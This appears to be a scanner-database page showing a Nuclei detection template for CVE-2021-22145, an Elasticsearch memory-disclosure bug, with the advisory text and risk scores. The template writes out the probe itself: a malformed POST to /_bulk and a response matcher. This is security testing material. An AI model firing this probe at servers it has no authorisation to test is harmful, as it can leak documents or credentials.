Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-22145
HistorySep 02, 2021 - 4:37 p.m.

Elasticsearch 7.10.0-7.13.3 - Information Disclosure

2021-09-0216:37:29
ProjectDiscovery
github.com
13

6.6 Medium

AI Score

Confidence

High

0.964 High

EPSS

Percentile

99.6%

ElasticSsarch 7.10.0 to 7.13.3 is susceptible to information disclosure. A user with the ability to submit arbitrary queries can submit a malformed query that results in an error message containing previously used portions of a data buffer. This buffer can contain sensitive information such as Elasticsearch documents or authentication details, thus potentially leading to data modification and/or execution of unauthorized operations.

id: CVE-2021-22145

info:
  name: Elasticsearch 7.10.0-7.13.3 - Information Disclosure
  author: dhiyaneshDk
  severity: medium
  description: ElasticSsarch 7.10.0 to 7.13.3 is susceptible to information disclosure. A user with the ability to submit arbitrary queries can submit a malformed query that results in an error message containing previously used portions of a data buffer. This buffer can contain sensitive information such as Elasticsearch documents or authentication details, thus potentially leading to data modification and/or execution of unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information.
  remediation: |
    Upgrade Elasticsearch to a version that is not affected by CVE-2021-22145.
  reference:
    - https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yaml
    - https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html
    - https://discuss.elastic.co/t/elasticsearch-7-13-4-security-update/279177
    - https://nvd.nist.gov/vuln/detail/CVE-2021-22145
    - https://security.netapp.com/advisory/ntap-20210827-0006/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2021-22145
    cwe-id: CWE-209
    epss-score: 0.96279
    epss-percentile: 0.99499
    cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: elastic
    product: elasticsearch
  tags: cve2021,cve,elasticsearch,packetstorm,elastic

http:
  - method: POST
    path:
      - '{{BaseURL}}/_bulk'

    body: |
      @

    headers:
      Content-Type: application/json

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'root_cause'
          - 'truncated'
          - 'reason'
        condition: and

      - type: status
        status:
          - 400
# digest: 4a0a00473045022014f0323c07e1c9f0a832d65c29ff4d67516455694fba9ccd53727b9fc4a6d38c022100fe6eb1ab330b614a4bd5dfc06532870a99005fcd2fabb1a02f2ed6cc21799534:922c64590222798bb761d5b6d8e72950

6.6 Medium

AI Score

Confidence

High

0.964 High

EPSS

Percentile

99.6%